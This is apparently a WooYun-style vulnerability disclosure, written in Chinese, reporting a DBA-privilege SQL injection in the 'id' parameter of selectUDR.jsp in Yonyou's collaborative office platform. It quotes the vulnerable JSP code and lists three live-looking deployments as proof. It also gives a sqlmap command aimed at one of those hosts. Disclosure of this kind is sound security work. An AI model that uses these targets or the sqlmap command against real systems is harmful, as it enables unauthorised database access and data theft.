用友软件协作办公平台通用DBA权限SQL注入漏洞之三

### 简要描述： 与http://www.wooyun.org/bugs/wooyun-2014-072183非同目录下 ### 详细说明： system/config/selectUDR.jsp ``` <% //String sIsModelWindow="0"; UserAnalyse userAnalyse=(UserAnalyse)ResourceManage.getContext("userAnalyse"); String saveValue=HtmlFormat.format(StringUtil.ISOToGBK(request.getParameter("id")));//注入点 String isModel=HtmlFormat.format(request.getParameter("isModel")); String tagValue=HtmlFormat.format(StringUtil.ISOToGBK(request.getParameter("tagValue"))); String tagShow=HtmlFormat.format(StringUtil.ISOToGBK(request.getParameter("tagShow"))); String showValue=""; saveValue="null".equals(saveValue)?"":saveValue; //if("".equals(saveValue)){ //saveValue="null".equals(tagValue)?"":tagValue; //} Map map=null; if(!"".equals(saveValue)) map=userAnalyse.getAllUserName(saveValue);//查询 if(map!=null){ for(Iterator it=map.keySet().iterator();it.hasNext();){ String v=(String)it.next(); if(v!=null) showValue+=v+","; } if(!"".equals(showValue)){ showValue=showValue.substring(0,showValue.lastIndexOf(",")); } } String promptStr=request.getParameter("code"); %> ``` ### 漏洞证明： #1.http://oa.danzi.com.cn:9090/system/config/selectUDR.jsp?id=1 [<img src="https://images.seebug.org/upload/201408/141258258ab48a35e91c2c6696658db778bab490.jpg" alt="y.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/141258258ab48a35e91c2c6696658db778bab490.jpg) #2.http://fsd2014.f3322.org:9090/system/config/selectUDR.jsp?id=1 测试语句： sqlmap -u "http://fsd2014.f3322.org:9090/system/config/selectUDR.jsp?id=1" --random-agent --level 5--risk 3 [<img src="https://images.seebug.org/upload/201408/14125843a71d827d5e25b67fb45982dce3763326.jpg" alt="y11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/14125843a71d827d5e25b67fb45982dce3763326.jpg) #3.http://220.168.210.109:9090/system/config/selectUDR.jsp?id=1 [<img src="https://images.seebug.org/upload/201408/141326165a59531aa8d27d7fb42e74893f3035d7.jpg" alt="y.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/141326165a59531aa8d27d7fb42e74893f3035d7.jpg)